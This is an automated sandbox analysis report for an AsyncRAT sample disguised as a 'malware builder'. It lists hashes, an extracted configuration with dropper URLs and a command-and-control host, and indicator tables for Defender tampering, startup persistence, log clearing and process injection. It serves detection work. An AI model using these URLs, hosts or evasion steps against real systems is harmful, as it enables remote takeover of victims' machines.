asyncrat | c981ebcf0c0cf857162ae35b9385c22d3198c2ec9ea00e37fcfe74a79eb3510e

Resubmissions

04/12/2024, 07:47

241204-jmh8dsyjgs 10

03/12/2024, 09:46

241203-lrs99szmav 10

Analysis

max time kernel
150s
max time network
144s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
03/12/2024, 09:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

H-Malware Builder V5.exe
Size

407KB
MD5

c8f6d76b4ae82978272bde392561c4f4
SHA1

80447d36fcf88cc9caa806db53e22d9468cc31ee
SHA256

c981ebcf0c0cf857162ae35b9385c22d3198c2ec9ea00e37fcfe74a79eb3510e
SHA512

10fa87f050a9ceb658e443317158ef8b1dbaa9e183ec61b5e5e42adb562f7918d996134aba7f0bbad852def4d6b0824c7b9716628b554194d0fd95974de6b2ad
SSDEEP

12288:r5p4UNBN3aqeKNoRfwoZrHMBV9EwEcb8+DvtuWUb:r9N3aqPCRooZwBjEhcYcvYWUb

Score

10^/10

asyncrat default defense_evasion execution rat

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://github.com/MalwareTeam/SecurityHealthService/raw/main/SecurityHealthService.exe

exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

bay-helps.gl.at.ply.gg:36538

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 4816 created 632	4816	Stub.exe	5
PID 1388 created 4872	1388	svchost.exe	90

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral3/files/0x002000000002aab2-24.dat	family_asyncrat
behavioral3/memory/4816-232-0x000001BAF4AC0000-0x000001BAF4AD2000-memory.dmp	family_asyncrat

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	3460	powershell.exe
3	3460	powershell.exe
5	5052	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 55 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
640	powershell.exe
1192	powershell.exe
3372	powershell.exe
1208	powershell.exe
3972	powershell.exe
4820	powershell.exe
4696	powershell.exe
3428	powershell.exe
2180	powershell.exe
1192	powershell.exe
2420	powershell.exe
5108	powershell.exe
1332	powershell.exe
1212	powershell.exe
3840	powershell.exe
4684	powershell.exe
4080	powershell.exe
4604	powershell.exe
4872	powershell.exe
1932	powershell.exe
4448	powershell.exe
984	powershell.exe
4256	powershell.exe
2360	powershell.exe
2012	powershell.exe
1612	powershell.exe
4956	powershell.exe
1124	powershell.exe
1544	powershell.exe
3796	powershell.exe
3432	powershell.exe
2180	powershell.exe
960	powershell.exe
4992	powershell.exe
5048	powershell.exe
5092	powershell.exe
2576	powershell.exe
2752	powershell.exe
4112	powershell.exe
4112	powershell.exe
1492	powershell.exe
5032	powershell.exe
244	powershell.exe
2088	powershell.exe
3716	powershell.exe
3364	powershell.exe
2752	powershell.exe
916	powershell.exe
1832	powershell.exe
1980	powershell.exe
4616	powershell.exe
4812	powershell.exe
3308	powershell.exe
716	powershell.exe
3552	powershell.exe

Drops startup file 54 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe

Executes dropped EXE 1 IoCs

pid	Process
4816	Stub.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	svchost.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Tasks\$77Stub.exe	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4816 set thread context of 4728	4816	Stub.exe	81

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Modifies data under HKEY_USERS 62 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 03 Dec 2024 09:48:15 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1733219298"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={5A091BB4-FAA7-4CAE-B669-38E63115A55C}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	svchost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
732	SCHTASKS.exe
428	SCHTASKS.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1192	powershell.exe
1192	powershell.exe
4816	Stub.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
3460	powershell.exe
3460	powershell.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
3460	powershell.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
5052	powershell.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
5052	powershell.exe
4728	dllhost.exe
4728	dllhost.exe
3460	powershell.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
5052	powershell.exe
4728	dllhost.exe
4728	dllhost.exe
3460	powershell.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
5052	powershell.exe
4728	dllhost.exe
4728	dllhost.exe
4980	WerFault.exe
4980	WerFault.exe
4728	dllhost.exe
4728	dllhost.exe
1388	svchost.exe
1388	svchost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe
4728	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3348	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1192	powershell.exe
Token: SeDebugPrivilege	4816	Stub.exe
Token: SeDebugPrivilege	4816	Stub.exe
Token: SeDebugPrivilege	4728	dllhost.exe
Token: SeDebugPrivilege	3460	powershell.exe
Token: SeDebugPrivilege	5052	powershell.exe
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeDebugPrivilege	3432	powershell.exe
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeDebugPrivilege	1492	powershell.exe
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeDebugPrivilege	640	powershell.exe
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeDebugPrivilege	1192	powershell.exe
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeDebugPrivilege	5032	powershell.exe
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeDebugPrivilege	244	powershell.exe
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeDebugPrivilege	2752	powershell.exe
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE
Token: SeDebugPrivilege	3372	powershell.exe
Token: SeShutdownPrivilege	3348	Explorer.EXE
Token: SeCreatePagefilePrivilege	3348	Explorer.EXE

Suspicious use of SetWindowsHookEx 23 IoCs

pid	Process
2668	Conhost.exe
3372	Conhost.exe
796	Conhost.exe
4708	Conhost.exe
4416	Conhost.exe
4852	Conhost.exe
4948	Conhost.exe
3136	Conhost.exe
3748	Conhost.exe
3032	Conhost.exe
1556	Conhost.exe
3632	Conhost.exe
3724	Conhost.exe
4872	Conhost.exe
3364	Conhost.exe
4408	Conhost.exe
1812	Conhost.exe
4068	Conhost.exe
4416	Conhost.exe
1900	Conhost.exe
3632	Conhost.exe
244	Conhost.exe
4388	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2500 wrote to memory of 1192	2500	H-Malware Builder V5.exe	77
PID 2500 wrote to memory of 1192	2500	H-Malware Builder V5.exe	77
PID 2500 wrote to memory of 4816	2500	H-Malware Builder V5.exe	79
PID 2500 wrote to memory of 4816	2500	H-Malware Builder V5.exe	79
PID 2500 wrote to memory of 2776	2500	H-Malware Builder V5.exe	80
PID 2500 wrote to memory of 2776	2500	H-Malware Builder V5.exe	80
PID 4816 wrote to memory of 4728	4816	Stub.exe	81
PID 4816 wrote to memory of 4728	4816	Stub.exe	81
PID 4816 wrote to memory of 4728	4816	Stub.exe	81
PID 4816 wrote to memory of 4728	4816	Stub.exe	81
PID 4816 wrote to memory of 4728	4816	Stub.exe	81
PID 4816 wrote to memory of 4728	4816	Stub.exe	81
PID 4816 wrote to memory of 4728	4816	Stub.exe	81
PID 4816 wrote to memory of 4728	4816	Stub.exe	81
PID 4816 wrote to memory of 4728	4816	Stub.exe	81
PID 4816 wrote to memory of 4728	4816	Stub.exe	81
PID 4816 wrote to memory of 4728	4816	Stub.exe	81
PID 4728 wrote to memory of 632	4728	dllhost.exe	5
PID 4728 wrote to memory of 692	4728	dllhost.exe	7
PID 4728 wrote to memory of 988	4728	dllhost.exe	12
PID 4728 wrote to memory of 468	4728	dllhost.exe	13
PID 4728 wrote to memory of 540	4728	dllhost.exe	14
PID 4728 wrote to memory of 772	4728	dllhost.exe	15
PID 4728 wrote to memory of 1052	4728	dllhost.exe	16
PID 4728 wrote to memory of 1132	4728	dllhost.exe	17
PID 4728 wrote to memory of 1140	4728	dllhost.exe	18
PID 4728 wrote to memory of 1152	4728	dllhost.exe	19
